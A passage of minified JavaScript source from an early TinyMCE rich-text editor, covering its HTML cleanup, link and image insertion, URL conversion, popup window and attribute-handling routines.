/>','g'),"");if(tinyMCE.settings['remove_linebreaks'])html=html.replace(new RegExp('\r|\n','g'),' ');if(tinyMCE.getParam('apply_source_formatting')){html=html.replace(new RegExp('<(p|div)([^>]*)>','g'),"\n<$1$2>\n");html=html.replace(new RegExp('<\/(p|div)([^>]*)>','g'),"\n</$1$2>\n");html=html.replace(new RegExp('<br />','g'),"<br />\n");}if(tinyMCE.settings['force_br_newlines']){var re=new RegExp('<p>&nbsp;</p>','g');html=html.replace(re,"<br />");}if(tinyMCE.isGecko&&tinyMCE.settings['remove_lt_gt']){var re=new RegExp('&lt;&gt;','g');html=html.replace(re,"");}html=tinyMCE._customCleanup(inst,on_save?"get_from_editor":"insert_to_editor",html);var chk=tinyMCE.regexpReplace(html,"[ \t\r\n]","").toLowerCase();if(chk=="<br/>"||chk=="<br>"||chk=="<p>&nbsp;</p>"||chk=="<p>&#160;</p>"||chk=="<p></p>")html="";if(tinyMCE.settings["preformatted"])return "<pre>"+html+"</pre>";return html;};TinyMCE.prototype.insertLink=function(href,target,title,onclick,style_class){tinyMCE.execCommand('mceBeginUndoLevel');if(this.selectedInstance&&this.selectedElement&&this.selectedElement.nodeName.toLowerCase()=="img"){var doc=this.selectedInstance.getDoc();var linkElement=tinyMCE.getParentElement(this.selectedElement,"a");var newLink=false;if(!linkElement){linkElement=doc.createElement("a");newLink=true;}href=eval(tinyMCE.settings['urlconverter_callback']+"(href, linkElement);");tinyMCE.setAttrib(linkElement,'href',href);tinyMCE.setAttrib(linkElement,'target',target);tinyMCE.setAttrib(linkElement,'title',title);tinyMCE.setAttrib(linkElement,'onclick',onclick);tinyMCE.setAttrib(linkElement,'class',style_class);if(newLink){linkElement.appendChild(this.selectedElement.cloneNode(true));this.selectedElement.parentNode.replaceChild(linkElement,this.selectedElement);}return;}if(!this.linkElement&&this.selectedInstance){if(tinyMCE.isSafari){tinyMCE.execCommand("mceInsertContent",false,'<a href="'+tinyMCE.uniqueURL+'">'+this.selectedInstance.getSelectedHTML()+'</a>');}else this.selectedInstance.contentDocument.execCommand("createlink",false,tinyMCE.uniqueURL);tinyMCE.linkElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);var elementArray=this.getElementsByAttributeValue(this.selectedInstance.contentDocument.body,"a","href",tinyMCE.uniqueURL);for(var i=0;i<elementArray.length;i++){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, elementArray[i]);");tinyMCE.setAttrib(elementArray[i],'href',href);tinyMCE.setAttrib(elementArray[i],'mce_real_href',href);tinyMCE.setAttrib(elementArray[i],'target',target);tinyMCE.setAttrib(elementArray[i],'title',title);tinyMCE.setAttrib(elementArray[i],'onclick',onclick);tinyMCE.setAttrib(elementArray[i],'class',style_class);}tinyMCE.linkElement=elementArray[0];}if(this.linkElement){href=eval(tinyMCE.settings['urlconverter_callback']+"(href, this.linkElement);");tinyMCE.setAttrib(this.linkElement,'href',href);tinyMCE.setAttrib(this.linkElement,'mce_real_href',href);tinyMCE.setAttrib(this.linkElement,'target',target);tinyMCE.setAttrib(this.linkElement,'title',title);tinyMCE.setAttrib(this.linkElement,'onclick',onclick);tinyMCE.setAttrib(this.linkElement,'class',style_class);}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.insertImage=function(src,alt,border,hspace,vspace,width,height,align,title,onmouseover,onmouseout){tinyMCE.execCommand('mceBeginUndoLevel');if(src=="")return;if(!this.imgElement&&tinyMCE.isSafari){var html="";html+='<img src="'+src+'" alt="'+alt+'"';html+=' border="'+border+'" hspace="'+hspace+'"';html+=' vspace="'+vspace+'" width="'+width+'"';html+=' height="'+height+'" align="'+align+'" title="'+title+'" onmouseover="'+onmouseover+'" onmouseout="'+onmouseout+'" />';tinyMCE.execCommand("mceInsertContent",false,html);}else{if(!this.imgElement&&this.selectedInstance){if(tinyMCE.isSafari)tinyMCE.execCommand("mceInsertContent",false,'<img src="'+tinyMCE.uniqueURL+'" />');else this.selectedInstance.contentDocument.execCommand("insertimage",false,tinyMCE.uniqueURL);tinyMCE.imgElement=this.getElementByAttributeValue(this.selectedInstance.contentDocument.body,"img","src",tinyMCE.uniqueURL);}}if(this.imgElement){var needsRepaint=false;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, tinyMCE.imgElement);");if(onmouseover&&onmouseover!="")onmouseover="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, tinyMCE.imgElement);")+"';";if(onmouseout&&onmouseout!="")onmouseout="this.src='"+eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, tinyMCE.imgElement);")+"';";if(typeof(title)=="undefined")title=alt;if(width!=this.imgElement.getAttribute("width")||height!=this.imgElement.getAttribute("height")||align!=this.imgElement.getAttribute("align"))needsRepaint=true;tinyMCE.setAttrib(this.imgElement,'src',src);tinyMCE.setAttrib(this.imgElement,'mce_real_src',src);tinyMCE.setAttrib(this.imgElement,'alt',alt);tinyMCE.setAttrib(this.imgElement,'title',title);tinyMCE.setAttrib(this.imgElement,'align',align);tinyMCE.setAttrib(this.imgElement,'border',border,true);tinyMCE.setAttrib(this.imgElement,'hspace',hspace,true);tinyMCE.setAttrib(this.imgElement,'vspace',vspace,true);tinyMCE.setAttrib(this.imgElement,'width',width,true);tinyMCE.setAttrib(this.imgElement,'height',height,true);tinyMCE.setAttrib(this.imgElement,'onmouseover',onmouseover);tinyMCE.setAttrib(this.imgElement,'onmouseout',onmouseout);if(width&&width!="")this.imgElement.style.pixelWidth=width;if(height&&height!="")this.imgElement.style.pixelHeight=height;if(needsRepaint)tinyMCE.selectedInstance.repaint();}tinyMCE.execCommand('mceEndUndoLevel');};TinyMCE.prototype.getElementByAttributeValue=function(node,element_name,attrib,value){var elements=this.getElementsByAttributeValue(node,element_name,attrib,value);if(elements.length==0)return null;return elements[0];};TinyMCE.prototype.getElementsByAttributeValue=function(node,element_name,attrib,value){var elements=new Array();if(node&&node.nodeName.toLowerCase()==element_name){if(node.getAttribute(attrib)&&node.getAttribute(attrib).indexOf(value)!=-1)elements[elements.length]=node;}if(node&&node.hasChildNodes()){for(var x=0,n=node.childNodes.length;x<n;x++){var childElements=this.getElementsByAttributeValue(node.childNodes[x],element_name,attrib,value);for(var i=0,m=childElements.length;i<m;i++)elements[elements.length]=childElements[i];}}return elements;};TinyMCE.prototype.isBlockElement=function(node){return node!=null&&node.nodeType==1&&this.blockRegExp.test(node.nodeName);};TinyMCE.prototype.getParentBlockElement=function(node){while(node){if(this.blockRegExp.test(node.nodeName))return node;node=node.parentNode;}return null;};TinyMCE.prototype.getNodeTree=function(node,node_array,type,node_name){if(typeof(type)=="undefined"||node.nodeType==type&&(typeof(node_name)=="undefined"||node.nodeName==node_name))node_array[node_array.length]=node;if(node.hasChildNodes()){for(var i=0;i<node.childNodes.length;i++)tinyMCE.getNodeTree(node.childNodes[i],node_array,type,node_name);}return node_array;};TinyMCE.prototype.getParentElement=function(node,names,attrib_name,attrib_value){if(typeof(names)=="undefined"){if(node.nodeType==1)return node;while((node=node.parentNode)!=null&&node.nodeType!=1);return node;}var namesAr=names.split(',');if(node==null)return null;do{for(var i=0;i<namesAr.length;i++){if(node.nodeName.toLowerCase()==namesAr[i].toLowerCase()||names=="*"){if(typeof(attrib_name)=="undefined")return node;else if(node.getAttribute(attrib_name)){if(typeof(attrib_value)=="undefined"){if(node.getAttribute(attrib_name)!="")return node;}else if(node.getAttribute(attrib_name)==attrib_value)return node;}}}}while((node=node.parentNode)!=null);return null;};TinyMCE.prototype.convertURL=function(url,node,on_save){var prot=document.location.protocol;var host=document.location.hostname;var port=document.location.port;var fileProto=(prot=="file:");url=tinyMCE.regexpReplace(url,'(http|https):///','/');if(url.indexOf('mailto:')!=-1||url.indexOf('javascript:')!=-1||tinyMCE.regexpReplace(url,'[ \t\r\n\+]|%20','').charAt(0)=="#")return url;if(!tinyMCE.isMSIE&&!on_save&&url.indexOf("://")==-1&&url.charAt(0)!='/')return tinyMCE.settings['base_href']+url;if(!tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var baseUrlParts=tinyMCE.parseURL(tinyMCE.settings['base_href']);if(urlParts['anchor']&&urlParts['path']==baseUrlParts['path'])return "#"+urlParts['anchor'];}if(on_save&&tinyMCE.getParam('relative_urls')){var urlParts=tinyMCE.parseURL(url);var tmpUrlParts=tinyMCE.parseURL(tinyMCE.settings['document_base_url']);if(urlParts['host']==tmpUrlParts['host']&&(!urlParts['port']||urlParts['port']==tmpUrlParts['port']))return tinyMCE.convertAbsoluteURLToRelativeURL(tinyMCE.settings['document_base_url'],url);}if(!fileProto&&tinyMCE.getParam('remove_script_host')){var start="",portPart="";if(port!="")portPart=":"+port;start=prot+"//"+host+portPart+"/";if(url.indexOf(start)==0)url=url.substring(start.length-1);if(!tinyMCE.getParam('relative_urls')&&url.indexOf('://')==-1&&url.charAt(0)!='/')url='/'+url;}return url;};TinyMCE.prototype.parseURL=function(url_str){var urlParts=new Array();if(url_str){var pos,lastPos;pos=url_str.indexOf('://');if(pos!=-1){urlParts['protocol']=url_str.substring(0,pos);lastPos=pos+3;}for(var i=lastPos;i<url_str.length;i++){var chr=url_str.charAt(i);if(chr==':')break;if(chr=='/')break;}pos=i;urlParts['host']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)==':'){pos=url_str.indexOf('/',lastPos);urlParts['port']=url_str.substring(lastPos+1,pos);}lastPos=pos;pos=url_str.indexOf('?',lastPos);if(pos==-1)pos=url_str.indexOf('#',lastPos);if(pos==-1)pos=url_str.length;urlParts['path']=url_str.substring(lastPos,pos);lastPos=pos;if(url_str.charAt(pos)=='?'){pos=url_str.indexOf('#');pos=(pos==-1)?url_str.length:pos;urlParts['query']=url_str.substring(lastPos+1,pos);}lastPos=pos;if(url_str.charAt(pos)=='#'){pos=url_str.length;urlParts['anchor']=url_str.substring(lastPos+1,pos);}}return urlParts;};TinyMCE.prototype.serializeURL=function(up){var url="";if(up['protocol'])url+=up['protocol']+"://";if(up['host'])url+=up['host'];if(up['port'])url+=":"+up['port'];if(up['path'])url+=up['path'];if(up['query'])url+="?"+up['query'];if(up['anchor'])url+="#"+up['anchor'];return url;};TinyMCE.prototype.convertAbsoluteURLToRelativeURL=function(base_url,url_to_relative){var baseURL=this.parseURL(base_url);var targetURL=this.parseURL(url_to_relative);var strTok1;var strTok2;var breakPoint=0;var outPath="";var forceSlash=false;if(targetURL.path=="")targetURL.path="/";else forceSlash=true;base_url=baseURL.path.substring(0,baseURL.path.lastIndexOf('/'));strTok1=base_url.split('/');strTok2=targetURL.path.split('/');if(strTok1.length>=strTok2.length){for(var i=0;i<strTok1.length;i++){if(i>=strTok2.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(strTok1.length<strTok2.length){for(var i=0;i<strTok2.length;i++){if(i>=strTok1.length||strTok1[i]!=strTok2[i]){breakPoint=i+1;break;}}}if(breakPoint==1)return targetURL.path;for(var i=0;i<(strTok1.length-(breakPoint-1));i++)outPath+="../";for(var i=breakPoint-1;i<strTok2.length;i++){if(i!=(breakPoint-1))outPath+="/"+strTok2[i];else outPath+=strTok2[i];}targetURL.protocol=null;targetURL.host=null;targetURL.port=null;targetURL.path=outPath==""&&forceSlash?"/":outPath;return this.serializeURL(targetURL);};TinyMCE.prototype.convertRelativeToAbsoluteURL=function(base_url,relative_url){var baseURL=TinyMCE.prototype.parseURL(base_url);var relURL=TinyMCE.prototype.parseURL(relative_url);if(relative_url==""||relative_url.charAt(0)=='/'||relative_url.indexOf('://')!=-1||relative_url.indexOf('mailto:')!=-1||relative_url.indexOf('javascript:')!=-1)return relative_url;baseURLParts=baseURL['path'].split('/');relURLParts=relURL['path'].split('/');var newBaseURLParts=new Array();for(var i=baseURLParts.length-1;i>=0;i--){if(baseURLParts[i].length==0)continue;newBaseURLParts[newBaseURLParts.length]=baseURLParts[i];}baseURLParts=newBaseURLParts.reverse();var newRelURLParts=new Array();var numBack=0;for(var i=relURLParts.length-1;i>=0;i--){if(relURLParts[i].length==0||relURLParts[i]==".")continue;if(relURLParts[i]=='..'){numBack++;continue;}if(numBack>0){numBack--;continue;}newRelURLParts[newRelURLParts.length]=relURLParts[i];}relURLParts=newRelURLParts.reverse();var len=baseURLParts.length-numBack;var absPath=(len<=0?"":"/")+baseURLParts.slice(0,len).join('/')+"/"+relURLParts.join('/');var start="",end="";relURL.protocol=baseURL.protocol;relURL.host=baseURL.host;relURL.port=baseURL.port;if(relURL.path.charAt(relURL.path.length-1)=="/")absPath+="/";relURL.path=absPath;return TinyMCE.prototype.serializeURL(relURL);};TinyMCE.prototype.getParam=function(name,default_value,strip_whitespace,split_chr){var value=(typeof(this.settings[name])=="undefined")?default_value:this.settings[name];if(value=="true"||value=="false")return(value=="true");if(strip_whitespace)value=tinyMCE.regexpReplace(value,"[ \t\r\n]","");if(typeof(split_chr)!="undefined"&&split_chr!=null){value=value.split(split_chr);var outArray=new Array();for(var i=0;i<value.length;i++){if(value[i]&&value[i]!="")outArray[outArray.length]=value[i];}value=outArray;}return value;};TinyMCE.prototype.getLang=function(name,default_value,parse_entities){var value=(typeof(tinyMCELang[name])=="undefined")?default_value:tinyMCELang[name];if(parse_entities){var el=document.createElement("div");el.innerHTML=value;value=el.innerHTML;}return value;};TinyMCE.prototype.addToLang=function(prefix,ar){for(var key in ar){if(typeof(ar[key])=='function')continue;tinyMCELang[(key.indexOf('lang_')==-1?'lang_':'')+(prefix!=''?(prefix+"_"):'')+key]=ar[key];}};TinyMCE.prototype.replaceVar=function(replace_haystack,replace_var,replace_str){var re=new RegExp('{\\\$'+replace_var+'}','g');return replace_haystack.replace(re,replace_str);};TinyMCE.prototype.replaceVars=function(replace_haystack,replace_vars){for(var key in replace_vars){var value=replace_vars[key];if(typeof(value)=='function')continue;replace_haystack=tinyMCE.replaceVar(replace_haystack,key,value);}return replace_haystack;};TinyMCE.prototype.triggerNodeChange=function(focus,setup_content){if(tinyMCE.settings['handleNodeChangeCallback']){if(tinyMCE.selectedInstance){var inst=tinyMCE.selectedInstance;var editorId=inst.editorId;var elm=(typeof(setup_content)!="undefined"&&setup_content)?tinyMCE.selectedElement:inst.getFocusElement();var undoIndex=-1;var undoLevels=-1;var anySelection=false;var selectedText=inst.getSelectedText();if(tinyMCE.settings["auto_resize"]){var doc=inst.getDoc();inst.iframeElement.style.width=doc.body.offsetWidth+"px";inst.iframeElement.style.height=doc.body.offsetHeight+"px";}if(tinyMCE.selectedElement)anySelection=(tinyMCE.selectedElement.nodeName.toLowerCase()=="img")||(selectedText&&selectedText.length>0);if(tinyMCE.settings['custom_undo_redo']){undoIndex=inst.undoIndex;undoLevels=inst.undoLevels.length;}tinyMCE.executeCallback('handleNodeChangeCallback','_handleNodeChange',0,editorId,elm,undoIndex,undoLevels,inst.visualAid,anySelection,setup_content);}}if(this.selectedInstance&&(typeof(focus)=="undefined"||focus))this.selectedInstance.contentWindow.focus();};TinyMCE.prototype._customCleanup=function(inst,type,content){var customCleanup=tinyMCE.settings['cleanup_callback'];if(customCleanup!=""&&eval("typeof("+customCleanup+")")!="undefined")content=eval(customCleanup+"(type, content, inst);");var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){if(eval("typeof(TinyMCE_"+plugins[i]+"_cleanup)")!="undefined")content=eval("TinyMCE_"+plugins[i]+"_cleanup(type, content, inst);");}return content;};TinyMCE.prototype.getContent=function(editor_id){if(typeof(editor_id)!="undefined")tinyMCE.selectedInstance=tinyMCE.getInstanceById(editor_id);if(tinyMCE.selectedInstance){var old=this.selectedInstance.getBody().innerHTML;var html=tinyMCE._cleanupHTML(this.selectedInstance,this.selectedInstance.getDoc(),tinyMCE.settings,this.selectedInstance.getBody(),false,true);tinyMCE.setInnerHTML(this.selectedInstance.getBody(),old);return html;}return null;};TinyMCE.prototype.setContent=function(html_content){if(tinyMCE.selectedInstance){tinyMCE.selectedInstance.execCommand('mceSetContent',false,html_content);tinyMCE.selectedInstance.repaint();}};TinyMCE.prototype.importThemeLanguagePack=function(name){if(typeof(name)=="undefined")name=tinyMCE.settings['theme'];tinyMCE.loadScript(tinyMCE.baseURL+'/themes/'+name+'/langs/'+tinyMCE.settings['language']+'.js');};TinyMCE.prototype.importPluginLanguagePack=function(name,valid_languages){var lang="en";valid_languages=valid_languages.split(',');for(var i=0;i<valid_languages.length;i++){if(tinyMCE.settings['language']==valid_languages[i])lang=tinyMCE.settings['language'];}tinyMCE.loadScript(tinyMCE.baseURL+'/plugins/'+name+'/langs/'+lang+'.js');};TinyMCE.prototype.applyTemplate=function(html,args){html=tinyMCE.replaceVar(html,"themeurl",tinyMCE.themeURL);if(typeof(args)!="undefined")html=tinyMCE.replaceVars(html,args);html=tinyMCE.replaceVars(html,tinyMCE.settings);html=tinyMCE.replaceVars(html,tinyMCELang);return html;};TinyMCE.prototype.openWindow=function(template,args){var html,width,height,x,y,resizable,scrollbars,url;args['mce_template_file']=template['file'];args['mce_width']=template['width'];args['mce_height']=template['height'];tinyMCE.windowArgs=args;html=template['html'];if(!(width=parseInt(template['width'])))width=320;if(!(height=parseInt(template['height'])))height=200;if(tinyMCE.isMSIE)height+=40;else height+=20;x=parseInt(screen.width/2.0)-(width/2.0);y=parseInt(screen.height/2.0)-(height/2.0);resizable=(args&&args['resizable'])?args['resizable']:"no";scrollbars=(args&&args['scrollbars'])?args['scrollbars']:"no";if(template['file'].charAt(0)!='/'&&template['file'].indexOf('://')==-1)url=tinyMCE.baseURL+"/themes/"+tinyMCE.getParam("theme")+"/"+template['file'];else url=template['file'];for(var name in args){if(typeof(args[name])=='function')continue;url=tinyMCE.replaceVar(url,name,escape(args[name]));}if(html){html=tinyMCE.replaceVar(html,"css",this.settings['popups_css']);html=tinyMCE.applyTemplate(html,args);var win=window.open("","mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog=yes,minimizable="+resizable+",modal=yes,width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}win.document.write(html);win.document.close();win.resizeTo(width,height);win.focus();}else{if(tinyMCE.isMSIE&&resizable!='yes'&&tinyMCE.settings["dialog_type"]=="modal"){var features="resizable:"+resizable+";scroll:"+scrollbars+";status:yes;center:yes;help:no;dialogWidth:"+width+"px;dialogHeight:"+height+"px;";window.showModalDialog(url,window,features);}else{var modal=(resizable=="yes")?"no":"yes";if(tinyMCE.isGecko&&tinyMCE.isMac)modal="no";if(template['close_previous']!="no")try{tinyMCE.lastWindow.close();}catch(ex){}var win=window.open(url,"mcePopup"+new Date().getTime(),"top="+y+",left="+x+",scrollbars="+scrollbars+",dialog="+modal+",minimizable="+resizable+",modal="+modal+",width="+width+",height="+height+",resizable="+resizable);if(win==null){alert(tinyMCELang['lang_popup_blocked']);return;}if(template['close_previous']!="no")tinyMCE.lastWindow=win;eval('try { win.resizeTo(width, height); } catch(e) { }');if(tinyMCE.isGecko){if(win.document.defaultView.statusbar.visible)win.resizeBy(0,tinyMCE.isMac?10:24);}win.focus();}}};TinyMCE.prototype.closeWindow=function(win){win.close();};TinyMCE.prototype.getVisualAidClass=function(class_name,state){var aidClass=tinyMCE.settings['visual_table_class'];if(typeof(state)=="undefined")state=tinyMCE.settings['visual'];var classNames=new Array();var ar=class_name.split(' ');for(var i=0;i<ar.length;i++){if(ar[i]==aidClass)ar[i]="";if(ar[i]!="")classNames[classNames.length]=ar[i];}if(state)classNames[classNames.length]=aidClass;var className="";for(var i=0;i<classNames.length;i++){if(i>0)className+=" ";className+=classNames[i];}return className;};TinyMCE.prototype.handleVisualAid=function(el,deep,state,inst){if(!el)return;var tableElement=null;switch(el.nodeName){case "TABLE":var oldW=el.style.width;var oldH=el.style.height;var bo=tinyMCE.getAttrib(el,"border");bo=bo==""||bo=="0"?true:false;tinyMCE.setAttrib(el,"class",tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el,"class"),state&&bo));el.style.width=oldW;el.style.height=oldH;for(var y=0;y<el.rows.length;y++){for(var x=0;x<el.rows[y].cells.length;x++){var cn=tinyMCE.getVisualAidClass(tinyMCE.getAttrib(el.rows[y].cells[x],"class"),state&&bo);tinyMCE.setAttrib(el.rows[y].cells[x],"class",cn);}}break;case "A":var anchorName=tinyMCE.getAttrib(el,"name");if(anchorName!=''&&state){el.title=anchorName;el.className='mceItemAnchor';}else if(anchorName!=''&&!state)el.className='';break;}if(deep&&el.hasChildNodes()){for(var i=0;i<el.childNodes.length;i++)tinyMCE.handleVisualAid(el.childNodes[i],deep,state,inst);}};TinyMCE.prototype.getAttrib=function(elm,name,default_value){if(typeof(default_value)=="undefined")default_value="";if(!elm||elm.nodeType!=1)return default_value;var v=elm.getAttribute(name);if(name=="class"&&!v)v=elm.className;if(name=="style"&&!tinyMCE.isOpera)v=elm.style.cssText;return(v&&v!="")?v:default_value;};TinyMCE.prototype.setAttrib=function(element,name,value,fix_value){if(typeof(value)=="number"&&value!=null)value=""+value;if(fix_value){if(value==null)value="";var re=new RegExp('[^0-9%]','g');value=value.replace(re,'');}if(name=="style")element.style.cssText=value;if(name=="class")element.className=value;if(value!=null&&value!=""&&value!=-1)element.setAttribute(name,value);else element.removeAttribute(name);};TinyMCE.prototype.setStyleAttrib=function(elm,name,value){eval('elm.style.'+name+'=value;');if(tinyMCE.isMSIE&&value==null||value==''){var str=tinyMCE.serializeStyle(tinyMCE.parseStyle(elm.style.cssText));elm.style.cssText=str;elm.setAttribute("style",str);}};TinyMCE.prototype.convertSpansToFonts=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<span/gi,'<font');h=h.replace(/<\/span/gi,'</font');doc.body.innerHTML=h;var s=doc.getElementsByTagName("font");for(var i=0;i<s.length;i++){var size=tinyMCE.trim(s[i].style.fontSize).toLowerCase();var fSize=0;for(var x=0;x<sizes.length;x++){if(sizes[x]==size){fSize=x+1;break;}}if(fSize>0){tinyMCE.setAttrib(s[i],'size',fSize);s[i].style.fontSize='';}var fFace=s[i].style.fontFamily;if(fFace!=null&&fFace!=""){tinyMCE.setAttrib(s[i],'face',fFace);s[i].style.fontFamily='';}var fColor=s[i].style.color;if(fColor!=null&&fColor!=""){tinyMCE.setAttrib(s[i],'color',tinyMCE.convertRGBToHex(fColor));s[i].style.color='';}}};TinyMCE.prototype.convertFontsToSpans=function(doc){var sizes=tinyMCE.getParam('font_size_style_values').replace(/\s+/,'').split(',');var h=doc.body.innerHTML;h=h.replace(/<font/gi,'<span');h=h.replace(/<\/font/gi,'</span');doc.body.innerHTML=h;var fsClasses=tinyMCE.getParam('font_size_classes');if(fsClasses!='')fsClasses=fsClasses.replace(/\s+/,'').split(',');else fsClasses=null;var s=doc.getElementsByTagName("span");for(var i=0;i<s.length;i++){var fSize,fFace,fColor;fSize=tinyMCE.getAttrib(s[i],'size');fFace=tinyMCE.getAttrib(s[i],'face');fColor=tinyMCE.getAttrib(s[i],'color');if(fSize!=""){fSize=parseInt(fSize);if(fSize>0&&fSize<8){if(fsClasses!=null)tinyMCE.setAttrib(s[i],'class',fsClasses[fSize-1]);else s[i].style.fontSize=sizes[fSize-1];}s[i].removeAttribute('size');}if(fFace!=""){s[i].style.fontFamily=fFace;s[i].removeAttribute('face');}if(fColor!=""){s[i].style.color=fColor;s[i].removeAttribute('color');}}};TinyMCE.prototype.setInnerHTML=function(e,h){if(tinyMCE.isMSIE&&!tinyMCE.isOpera){e.innerHTML='<div id="mceTMPElement" style="display: none">TMP</div>'+h;e.firstChild.removeNode(true);}else e.innerHTML=h;};TinyMCE.prototype.getOuterHTML=function(e){if(tinyMCE.isMSIE)return e.outerHTML;var d=e.ownerDocument.createElement("body");d.appendChild(e);return d.innerHTML;};TinyMCE.prototype.setOuterHTML=function(doc,e,h){if(tinyMCE.isMSIE){e.outerHTML=h;return;}var d=e.ownerDocument.createElement("body");d.innerHTML=h;e.parentNode.replaceChild(d.firstChild,e);};TinyMCE.prototype.insertAfter=function(nc,rc){if(rc.nextSibling)rc.parentNode.insertBefore(nc,rc.nextSibling);else rc.parentNode.appendChild(nc);};TinyMCE.prototype.cleanupAnchors=function(doc){var an=doc.getElementsByTagName("a");for(var i=0;i<an.length;i++){if(tinyMCE.getAttrib(an[i],"name")!=""){var cn=an[i].childNodes;for(var x=cn.length-1;x>=0;x--)tinyMCE.insertAfter(cn[x],an[i]);}}};TinyMCE.prototype._setHTML=function(doc,html_content){html_content=tinyMCE.cleanupHTMLCode(html_content);try{tinyMCE.setInnerHTML(doc.body,html_content);}catch(e){if(this.isMSIE)doc.body.createTextRange().pasteHTML(html_content);}if(tinyMCE.isMSIE&&tinyMCE.settings['fix_content_duplication']){var paras=doc.getElementsByTagName("P");for(var i=0;i<paras.length;i++){var node=paras[i];while((node=node.parentNode)!=null){if(node.nodeName.toLowerCase()=="p")node.outerHTML=node.innerHTML;}}var html=doc.body.innerHTML;if(html.indexOf('="mso')!=-1){for(var i=0;i<doc.body.all.length;i++){var el=doc.body.all[i];el.removeAttribute("className","",0);el.removeAttribute("style","",0);}html=doc.body.innerHTML;html=tinyMCE.regexpReplace(html,"<o:p><\/o:p>","<br />");html=tinyMCE.regexpReplace(html,"<o:p>&nbsp;<\/o:p>","");html=tinyMCE.regexpReplace(html,"<st1:.*?>","");html=tinyMCE.regexpReplace(html,"<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p><\/p>\r\n<p><\/p>","");html=tinyMCE.regexpReplace(html,"<p>&nbsp;<\/p>","<br />");html=tinyMCE.regexpReplace(html,"<p>\s*(<p>\s*)?","<p>");html=tinyMCE.regexpReplace(html,"<\/p>\s*(<\/p>\s*)?","</p>");}tinyMCE.setInnerHTML(doc.body,html);}tinyMCE.cleanupAnchors(doc);if(tinyMCE.getParam("convert_fonts_to_spans"))tinyMCE.convertSpansToFonts(doc);};TinyMCE.prototype.getImageSrc=function(str){var pos=-1;if(!str)return "";if((pos=str.indexOf('this.src='))!=-1){var src=str.substring(pos+10);src=src.substring(0,src.indexOf('\''));return src;}return "";};TinyMCE.prototype._getElementById=function(element_id){var elm=document.getElementById(element_id);if(!elm){for(var j=0;j<document.forms.length;j++){for(var k=0;k<document.forms[j].elements.length;k++){if(document.forms[j].elements[k].name==element_id){elm=document.forms[j].elements[k];break;}}}}return elm;};TinyMCE.prototype.getEditorId=function(form_element){var inst=this.getInstanceById(form_element);if(!inst)return null;return inst.editorId;};TinyMCE.prototype.getInstanceById=function(editor_id){var inst=this.instances[editor_id];if(!inst){for(var n in tinyMCE.instances){var instance=tinyMCE.instances[n];if(!tinyMCE.isInstance(instance))continue;if(instance.formTargetElementId==editor_id){inst=instance;break;}}}return inst;};TinyMCE.prototype.queryInstanceCommandValue=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandValue(command);return false;};TinyMCE.prototype.queryInstanceCommandState=function(editor_id,command){var inst=tinyMCE.getInstanceById(editor_id);if(inst)return inst.queryCommandState(command);return null;};TinyMCE.prototype.setWindowArg=function(name,value){this.windowArgs[name]=value;};TinyMCE.prototype.getWindowArg=function(name,default_value){return(typeof(this.windowArgs[name])=="undefined")?default_value:this.windowArgs[name];};TinyMCE.prototype.getCSSClasses=function(editor_id,doc){var output=new Array();if(typeof(tinyMCE.cssClasses)!="undefined")return tinyMCE.cssClasses;if(typeof(editor_id)=="undefined"&&typeof(doc)=="undefined"){var instance;for(var instanceName in tinyMCE.instances){instance=tinyMCE.instances[instanceName];if(!tinyMCE.isInstance(instance))continue;break;}doc=instance.getDoc();}if(typeof(doc)=="undefined"){var instance=tinyMCE.getInstanceById(editor_id);doc=instance.getDoc();}if(doc){var styles=tinyMCE.isMSIE?doc.styleSheets:doc.styleSheets;if(styles&&styles.length>0){for(var x=0;x<styles.length;x++){var csses=null;eval("try {var csses = tinyMCE.isMSIE ? doc.styleSheets("+x+").rules : doc.styleSheets["+x+"].cssRules;} catch(e) {}");if(!csses)return new Array();for(var i=0;i<csses.length;i++){var selectorText=csses[i].selectorText;if(selectorText){var rules=selectorText.split(',');for(var c=0;c<rules.length;c++){if(rules[c].indexOf(' ')!=-1||rules[c].indexOf(':')!=-1||rules[c].indexOf('mceItem')!=-1)continue;if(rules[c]=="."+tinyMCE.settings['visual_table_class'])continue;if(rules[c].indexOf('.')!=-1){output[output.length]=rules[c].substring(rules[c].indexOf('.')+1);}}}}}}}if(output.length>0)tinyMCE.cssClasses=output;return output;};TinyMCE.prototype.regexpReplace=function(in_str,reg_exp,replace_str,opts){if(in_str==null)return in_str;if(typeof(opts)=="undefined")opts='g';var re=new RegExp(reg_exp,opts);return in_str.replace(re,replace_str);};TinyMCE.prototype.trim=function(str){return str.replace(/^\s*|\s*$/g,"");};TinyMCE.prototype.cleanupEventStr=function(str){str=""+str;str=str.replace('function anonymous()\n{\n','');str=str.replace('\n}','');str=str.replace(/^return true;/gi,'');return str;};TinyMCE.prototype.getAbsPosition=function(node){var pos=new Object();pos.absLeft=pos.absTop=0;var parentNode=node;while(parentNode){pos.absLeft+=parentNode.offsetLeft;pos.absTop+=parentNode.offsetTop;parentNode=parentNode.offsetParent;}return pos;};TinyMCE.prototype.getControlHTML=function(control_name){var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_getControlHTML";if(eval("typeof("+templateFunction+")")!='undefined'){var html=eval(templateFunction+"('"+control_name+"');");if(html!="")return tinyMCE.replaceVar(html,"pluginurl",tinyMCE.baseURL+"/plugins/"+themePlugins[i]);}}return 